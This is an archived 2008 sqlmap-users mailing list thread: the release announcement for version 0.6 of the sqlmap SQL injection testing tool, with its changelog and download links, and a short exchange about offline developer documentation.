GnuPG v1.4.6 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFIu/YgdntYwQX1ow8RAiF6AKCkaQihjZPBAx7AAa649r6q71S/PACeJ5Fh AqsW5PjG2eiZkXSrMJQXPMQ= =lE9p -----END PGP SIGNATURE----- ------------------------------------------------------------------------- This SF.Net email is sponsored by the Moblin Your Move Developer's challenge Build the coolest Linux based applications with Moblin SDK & win great prizes Grand prize is a trip for two to an Open Source event anywhere in the world http://moblin-contest.org/redirect.php?banner_id=100&url=/ _______________________________________________ sqlmap-users mailing list sql...@li... https://lists.sourceforge.net/lists/listinfo/sqlmap-users __________________________________________________ Do You Yahoo!? Poco spazio e tanto spam? Yahoo! Mail ti protegge dallo spam e ti da tanto spazio gratuito per i tuoi file e i messaggi http://mail.yahoo.it |
|
From: Bernardo D. A. G. <ber...@gm...> - 2008-09-01 14:03:19
|
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hi Christian, Christian Eric EDJENGUELE wrote: > Great!, > it's well documented, but the user documention is not part of the program as well as the developer manual. it should be interesting to have a offline version of the developer manual with source code. The user's manual is part of the sqlmap packages. You can find it at doc/README.[html|pdf]. The developer's documentation is not part of the sqlmap package, it's only available online because it's 4.8 Mb of files, but I will consider to create a compressed package out of it and upload it to the SourceForge File List page too. - -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile number: +39-3493821385 PGP Key ID: 0x05F5A30F -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFIu/YgdntYwQX1ow8RAiF6AKCkaQihjZPBAx7AAa649r6q71S/PACeJ5Fh AqsW5PjG2eiZkXSrMJQXPMQ= =lE9p -----END PGP SIGNATURE----- |
|
From: Christian E. E. <c_e...@ya...> - 2008-09-01 13:55:59
|
Great!, it's well documented, but the user documention is not part of the program as well as the developer manual. it should be interesting to have a offline version of the developer manual with source code. === Christian Eric Edjenguele IT Security Software Developer & Researcher tel. +39 3408580513 View my linkedin profile: http://www.linkedin.com/in/edjenguele My blog: http://www.edjenguele.blogspot.com --- Management, Developers, Security Professionals – can only result in one thing…… better security. http://www.owasp.org/index.php/OWASP_NYC_AppSec_2008_Conference Sept 22nd-25th 2008 ----- Messaggio originale ----- Da: Bernardo Damele A. G. <ber...@gm...> A: sql...@li...; sql...@li... Inviato: Lunedì 1 settembre 2008, 15:30:08 Oggetto: [sqlmap-users] sqlmap 0.6 released -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hi, First of all thanks for subscribing to the sqlmap mailing lists. I am glad to release sqlmap version 0.6. Thanks to anyone of you that contributed with really appreciated and useful feedback. Changes ======= Some of the new features include: * Added multithreading support to set the maximum number of concurrent HTTP requests. * Implemented SQL shell (--sql-shell) functionality and fixed SQL query (--sql-query, before called -e) to be able to run whatever SELECT statement and get its output in both inband and blind SQL injection attack. * Added an option (--privileges) to retrieve DBMS users privileges, it also notifies if the user is a DBMS administrator. * Added support (-c) to read options from configuration file, an example of valid INI file is sqlmap.conf and support (--save) to save command line options on a configuration file. * Implemented support for HTTPS requests over HTTP(S) proxy. * Enhanced logging system: added three more levels of verbosity to show also HTTP sent and received traffic. Complete list of changes at http://sqlmap.sourceforge.net/doc/ChangeLog. Download ======== You can download it in various formats: * Source gzip compressed, http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.tar.gz * Source bzip2 compressed, http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.tar.bz2 * Source zip compressed, http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.zip * DEB binary package, http://downloads.sourceforge.net/sqlmap/sqlmap_0.6-1_all.deb * RPM binary package, http://downloads.sourceforge.net/sqlmap/sqlmap-0.6-1.noarch.rpm * Portable executable for Windows that does not require the Python interpreter to be installed on the operating system, http://downloads.sourceforge.net/sqlmap/sqlmap-0.6_exe.zip Note: the subversion repository is not accessible anymore so the only way to get the new release is to download it from one of the above links. Documentation ============= * sqlmap user's manual: http://sqlmap.sourceforge.net/doc/README.pdf * sqlmap developer's documentation: http://sqlmap.sourceforge.net/dev/ Happy hacking! - -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile number: +39-3493821385 PGP Key ID: 0x05F5A30F -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFIu+5gdntYwQX1ow8RAmm+AJsGX9RSv2g0hrN7D9NUlt74EwGatACeNydx MN7qHzFLsJVecXui/tizalg= =XhRM -----END PGP SIGNATURE----- ------------------------------------------------------------------------- This SF.Net email is sponsored by the Moblin Your Move Developer's challenge Build the coolest Linux based applications with Moblin SDK & win great prizes Grand prize is a trip for two to an Open Source event anywhere in the world http://moblin-contest.org/redirect.php?banner_id=100&url=/ _______________________________________________ sqlmap-users mailing list sql...@li... https://lists.sourceforge.net/lists/listinfo/sqlmap-users __________________________________________________ Do You Yahoo!? Poco spazio e tanto spam? Yahoo! Mail ti protegge dallo spam e ti da tanto spazio gratuito per i tuoi file e i messaggi http://mail.yahoo.it |
48 messages has been excluded from this view by a project administrator.
